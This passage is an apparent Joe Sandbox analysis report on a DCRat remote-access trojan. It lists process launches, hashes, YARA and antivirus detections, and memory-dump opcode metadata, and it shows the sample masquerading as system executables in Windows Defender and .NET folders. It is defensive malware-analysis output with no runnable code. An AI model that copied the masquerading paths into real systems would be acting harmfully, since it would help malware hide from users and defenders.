            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2231770511.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            Target ID:34
            Start time:09:32:02
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0xa10000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2261381314.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2261381314.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:35
            Start time:09:32:08
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0xa00000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2323041315.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:37
            Start time:09:32:16
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0x20000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:38
            Start time:09:32:24
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0x260000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2457019815.00000000025ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:40
            Start time:09:32:33
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0xc30000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2520255820.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:41
            Start time:09:32:41
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0x850000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.2635446252.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Reset < >
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73355059e11d3a041c181fe50c66e18e1bb43f2f6bd72b774f88bdeb3c05544d
              • Instruction ID: 7ffe181de37c50026b26b338a44a34a88b01d16922b85db5d694724639f74590
              • Opcode Fuzzy Hash: 73355059e11d3a041c181fe50c66e18e1bb43f2f6bd72b774f88bdeb3c05544d
              • Instruction Fuzzy Hash: 2CA17DB1B1894E8EEB94DB68C8657BD7BE1FF9A310F40017AD00DD32D6CBB968018781
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d48262401abb25fa91984b461b4a848eb6d9eca4c878f920186a1398ce78abfd
              • Instruction ID: 93ca7715116f7ecdf873a95db3da9d3424092fe951cb2b90cd3ace3cc634c7cf
              • Opcode Fuzzy Hash: d48262401abb25fa91984b461b4a848eb6d9eca4c878f920186a1398ce78abfd
              • Instruction Fuzzy Hash: 6781C371A08A4A8FDB85EF68D4A95FE37A0FF16314F0445BAD059D7192DE39B850CBC0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 1$?$H$K$L$k${
              • API String ID: 0-824296765
              • Opcode ID: fc63a095bf50283b7f9708ee5495722bc4b337046482050193d6526e39027488
              • Instruction ID: 1da73880857f3b9970290e7c34e6610b647c5e1546f93b488dd1a371d4ba7320
              • Opcode Fuzzy Hash: fc63a095bf50283b7f9708ee5495722bc4b337046482050193d6526e39027488
              • Instruction Fuzzy Hash: 65611D70E19A69CBDBA8DF18CCA57ADB7B5FB55301F1001FAD10DE2291DA386A81CF41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: P$j${
              • API String ID: 0-2719876955
              • Opcode ID: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction ID: 927678251de0ec49911dab89f03573bdfcfb8db48f51b27e053b5e34f2b49a8f
              • Opcode Fuzzy Hash: 4f31c46347debe9f07d3145b7453952ebf05d33b2631d285b7cd4603e752190a
              • Instruction Fuzzy Hash: 4B21ECB0D19629CFEB64DF14C8947E8B6F5AB59301F0041FAD60DE2281CB7C6A94DF85
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: Ng4$p\g4
              • API String ID: 0-3099952731
              • Opcode ID: 22566a96872972ea24fbe135fa3bd536afb6e9c8661100968bbf4e74c05ffed4
              • Instruction ID: b6efbf5196f2bf70937f540b8b2017f24b6f740eb14c3b28659e6505e7b3cd7a
              • Opcode Fuzzy Hash: 22566a96872972ea24fbe135fa3bd536afb6e9c8661100968bbf4e74c05ffed4
              • Instruction Fuzzy Hash: 56E12F71E18A598FEBA8DF68C4A57BCB7E1FF59304F1441BAD00DE7292CA386840DB41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: #t
              • API String ID: 0-1562333614
              • Opcode ID: 4305c356b8f6cfc48cae75e0d90a8275c72b876516acd28ae72a3d5184507196
              • Instruction ID: 3a1c27d4ce4ec8dd2725e76a80aa213782e3f005845d92261c97d30b912696a8
              • Opcode Fuzzy Hash: 4305c356b8f6cfc48cae75e0d90a8275c72b876516acd28ae72a3d5184507196
              • Instruction Fuzzy Hash: 6B41B371A0890ACFEB94EF6894A92FD77E0FF19315F00057AD80DD2292DE34B594CB81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 1
              • API String ID: 0-2212294583
              • Opcode ID: b7c1ad248a9d3cfe442eb7ad83bdd642a49057f60c80019b490a0873dd28929c
              • Instruction ID: a8cabf93d38740024345727fd3974feec2615986d980a3c3cfaface4e83627cb
              • Opcode Fuzzy Hash: b7c1ad248a9d3cfe442eb7ad83bdd642a49057f60c80019b490a0873dd28929c
              • Instruction Fuzzy Hash: B8411A71A18A598FDBA8DB18CC95BADB3B1FB54301F1401EAD44DE3291DE356EC18F40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: Q_H
              • API String ID: 0-1722020806
              • Opcode ID: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction ID: c25fa1d38dd96b0ed94a3753560548ad88f394df9acdaf03e633fbf12cff7968
              • Opcode Fuzzy Hash: edaa240c9db56afbde41697220ee6d8c53717bfbd0de2de613a339908640f3d0
              • Instruction Fuzzy Hash: B731BAB1E1891D9FEF94EB5898A56ACB7B1FFAA300F501139D10DE3281DE2868419B40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: 8vh4
              • API String ID: 0-3359051434
              • Opcode ID: 2e2c860b4debc28ed421aa9ea3a440834d0a2151ecee28191629e352b0ff42b2
              • Instruction ID: 4a2f75aaaabbeab8033754174e09ce9e39039b595e57bb59362a437676a2e52f
              • Opcode Fuzzy Hash: 2e2c860b4debc28ed421aa9ea3a440834d0a2151ecee28191629e352b0ff42b2
              • Instruction Fuzzy Hash: 15119171E2854E8FE790EF68C8992BE77E1FF1A310F4145B6C508D61A2EE38B540D780
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction ID: dc650328dd4a99d55834710986662a36cf1595151db8f14b8c458e0661874ea6
              • Opcode Fuzzy Hash: f95d571810451aa7e5491a3421520000e88662309b4a1d6bf5609c117171e9d8
              • Instruction Fuzzy Hash: 0111C171B0968A8EFB99AF64C4A82BD7BE0FF5A300F0404BED50AD61D2DE38A550D740
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: !
              • API String ID: 0-2657877971
              • Opcode ID: bea191dfd14c9a9f3d461b50cd3b119532132900a2a499a04bbe4867a97674a6
              • Instruction ID: 70e2e6e77d98fead7b93ddbba2a3be3b272f5fd23013d9b45b1b244308e626c4
              • Opcode Fuzzy Hash: bea191dfd14c9a9f3d461b50cd3b119532132900a2a499a04bbe4867a97674a6
              • Instruction Fuzzy Hash: C8110071A0961A8BDBA8DF44C8A57A977B5EB55311F0041F9C10DD2281CF346A81DF80
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: pyh4
              • API String ID: 0-2647341381
              • Opcode ID: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction ID: 46d2eeb830f0a3a65a73515e04597f1addc06d235922b95efe076020510948d1
              • Opcode Fuzzy Hash: 2b6dfb072f37488d02ecbf039f1dfe432b5dcfed56b4edb2e14891301bce178f
              • Instruction Fuzzy Hash: D2F0A471F1954E8AFF98ABA485A82F977E4FF56304F04007AE519D10C2DE286514D680
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction ID: 8e298af41b894b31546342cb930d954c4866487b84085c9842d31012ce374ed0
              • Opcode Fuzzy Hash: 10c550925e895b7b54b72724d769e8f45d8e916000d97935d318d1f74e7e08fe
              • Instruction Fuzzy Hash: EB91C271B0CA4A8FEB59DE1C88A55B977E2FF99304B14057AE54DD3282CE38BC12C781
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 787855613e0b7d26029ac5b281da34a72f526ffdaae076a157b668004bf37c2b
              • Instruction ID: 9b7ddfef465d601e78abbc8761f8fd03904db0a117dac99ce22c77c4b61dfe74
              • Opcode Fuzzy Hash: 787855613e0b7d26029ac5b281da34a72f526ffdaae076a157b668004bf37c2b
              • Instruction Fuzzy Hash: 7B91D871F1994D8FEBA4EB688865BE9B3B1FF56310F0042B9D00DE7192DE3879459B80
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e3c5f50f24cc2b5959eb1d12767af082762111b597788b3e840a73fc21c4dd71
              • Instruction ID: b566fe8d34800dc95b0fa057ae94775147e1e6f390441892f4d90483b0e3f903
              • Opcode Fuzzy Hash: e3c5f50f24cc2b5959eb1d12767af082762111b597788b3e840a73fc21c4dd71
              • Instruction Fuzzy Hash: B1710572B1C65A8FEB55BBA8E4A50FD7BA0EF43325F0405BBD208C6093DE283449D791
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction ID: 9072b870c280f357b7be7ddcef9182d4fb92e93659a46e0f527a4e4d81df1fe8
              • Opcode Fuzzy Hash: 97a3ab71b8d4c6437a8a426e355b77efb6fc1733609009485d499e05a036e0e5
              • Instruction Fuzzy Hash: 5251E470B18A4A8FEB5CDE1888A55BA73E2FF99304B14457ED54EC3281CE34B812C7C1
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdfb7ee2cfcc289152565468707c226789c866d16a3eefb45fc0d7d3bf7b5d8c
              • Instruction ID: b8655ed5254d40ed18c59696bc37cc7370571cc8cd4893659c10ffc6f18972c2
              • Opcode Fuzzy Hash: bdfb7ee2cfcc289152565468707c226789c866d16a3eefb45fc0d7d3bf7b5d8c
              • Instruction Fuzzy Hash: 065109B1E1851ACFEB54EF94C4A46ED77F1FF4A311F500179D109E7292DA38A944DB80
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8cfbf77458725c56d4a73f3200853abd2da927fc00665633007eb2bd995d0514
              • Instruction ID: 2ab9720adfa7c9193a4a49d338251a88bf0a70b7489bfe6cb560fd40dcd99b4f
              • Opcode Fuzzy Hash: 8cfbf77458725c56d4a73f3200853abd2da927fc00665633007eb2bd995d0514
              • Instruction Fuzzy Hash: 2C413671B0DA4A8FE795EB7894A51B977E1EF87300F0549BBD50DC72A2DE2CB8418381
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction ID: 10098bcdb8c23f32b2118788cc0114741fd3f8bbd287b8adba7b80565fd66168
              • Opcode Fuzzy Hash: a9929934709bb1a7b455dc6780ddf9ad101c985a925a1c61815ef1dbc21a691b
              • Instruction Fuzzy Hash: DB316070B18A4A8FDB4CDE1CC8A557A73E2FBD9345B14463EE54AD3285CE34E8128B81
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f4b0b55f3c7f1ac8e1193a3c75acc01b5f8052d5ae0537be5237ed40a968e56
              • Instruction ID: 111270e88e599a75bc175e1e0efadb1df5de53465573cee5dd8bf8016707b3e1
              • Opcode Fuzzy Hash: 0f4b0b55f3c7f1ac8e1193a3c75acc01b5f8052d5ae0537be5237ed40a968e56
              • Instruction Fuzzy Hash: 7E21A257A4E7966AE35276B868B70FA3FA48F13328B0805B3E58CC9093EC08605D9291
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction ID: 082edb592343e9fdd6899a60f1165915bfa6fe0c598e24b5cf39059f1dac1a99
              • Opcode Fuzzy Hash: b1713b35a72a26fdc9dd8b694d343e5fe0ac7fecac48adc6154a64401e746cd0
              • Instruction Fuzzy Hash: E221CEB1E1C91DCFEF94EB5898A96ACB7B1FF5A300F50113AD10DE7282DE2868419B40
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f95157fbaad39cd216970c64b69b243bae0aafcdd879550cab456d88aeadd67c
              • Instruction ID: 087bcd66cd31bdcd08b6ada92eea6d1dfcdd21e529e523bfcb3a7c3fcd9b020d
              • Opcode Fuzzy Hash: f95157fbaad39cd216970c64b69b243bae0aafcdd879550cab456d88aeadd67c
              • Instruction Fuzzy Hash: 7621D866A4E3869FE752B77858A61F93FE0DF17318F0808B3D588CA093ED18614DD381
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61630e4b97f7f4915eedcede016753b816dd77c90d5bd38421ca9d197ab028bb
              • Instruction ID: 9dd37b0e66fc6c4620f6da92d4739cc739f0197f62d567584464177112fdb490
              • Opcode Fuzzy Hash: 61630e4b97f7f4915eedcede016753b816dd77c90d5bd38421ca9d197ab028bb
              • Instruction Fuzzy Hash: DA31D17194D2CA8FDB469B7088BA1FA3FB4AF07310F0901EBD449CB5A3DA2D6146C352
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b760532c19f28439af31a2592cddd4ac99cecb9f44dda7eb368a403367b0210
              • Instruction ID: e3a45d21b9232f757f23962f0375705f2de4c3a4b6ec975e38ff5bd7e05dc063
              • Opcode Fuzzy Hash: 0b760532c19f28439af31a2592cddd4ac99cecb9f44dda7eb368a403367b0210
              • Instruction Fuzzy Hash: 2F317CB6B089178FEB55BAA8A4A60FD7B90EF53339F040537D60CD6093DE2C3495A2D4
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ebeae644347bd35c41a14f2ee87af6016315027c725bb7f02a16c39443e8e44
              • Instruction ID: bad0c6e32f0528685a24eb291b6fed96262452d12e6282e31b670d2bf45c8602
              • Opcode Fuzzy Hash: 2ebeae644347bd35c41a14f2ee87af6016315027c725bb7f02a16c39443e8e44
              • Instruction Fuzzy Hash: 9021AE71A1890ECEEB50EB6888AD6B977E5FF4A300F4049B6D11CD31A6EE38B540D780
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction ID: ae6b2ee9e1b5831e2c475b2672928606ae44ecc5361abcae0f8f17591d7068b2
              • Opcode Fuzzy Hash: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction Fuzzy Hash: 27217F70A4864ECFEB95EB6488A92BA77E0FF1A304F0008BAD419D6191DF38A554D781
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8fdec384804a78b35bf53f827fbce6f0929804a1db8bfd79fc65f7c98cfa6bb
              • Instruction ID: 6277146cc20434783b63cfd3302ffea5464e0dfa1d7a2b64b4ad23f7282c9e68
              • Opcode Fuzzy Hash: b8fdec384804a78b35bf53f827fbce6f0929804a1db8bfd79fc65f7c98cfa6bb
              • Instruction Fuzzy Hash: 85219771A0890D8FEBA4EB74C8A96BDB7A1EF59300F10007ED10ED7291DE797881DB81
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9e2fd3de7140da05ac55b406476183f3ec58f5319f211f7e2e3ddc696cc2c6d
              • Instruction ID: 8185ad2e9fffc4b9c82580ca85f0814949a3d4e03cadf4b3025e827ea67bca5e
              • Opcode Fuzzy Hash: f9e2fd3de7140da05ac55b406476183f3ec58f5319f211f7e2e3ddc696cc2c6d
              • Instruction Fuzzy Hash: AD21CF71A1891E8FDBA4EB98D4A56FE77E0FF5A304F00003AD14AE2281DE386440CB91
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction ID: 470d1fbb3d9cddcb7076282c2ba81f86d7dfa25d17a5c9f252dffec1be3b4f6f
              • Opcode Fuzzy Hash: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction Fuzzy Hash: 0B214A70A1864D8FDB89EF68C495AE93BF0FF69315F01416AE80AD7251DB34E951CB80
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction ID: 9ba8daaf3d6f6c91b7e397311d111ef2c5d19fe09b82ca086385cd23cb80280a
              • Opcode Fuzzy Hash: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction Fuzzy Hash: 6E21C67054D28A8FD342EBB488686A97FF0FF4B310F0544E6C045CB062DA3C9545C750
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2133849606.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd34790000_XPC5PMKegV.jbxd
              Similarity
              • API ID:
              • String ID: $"$=$C$Y$[$]
              • API String ID: 0-3933176780
              Memory Dump Source
              • Source File: 00000005.00000002.2211182452.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
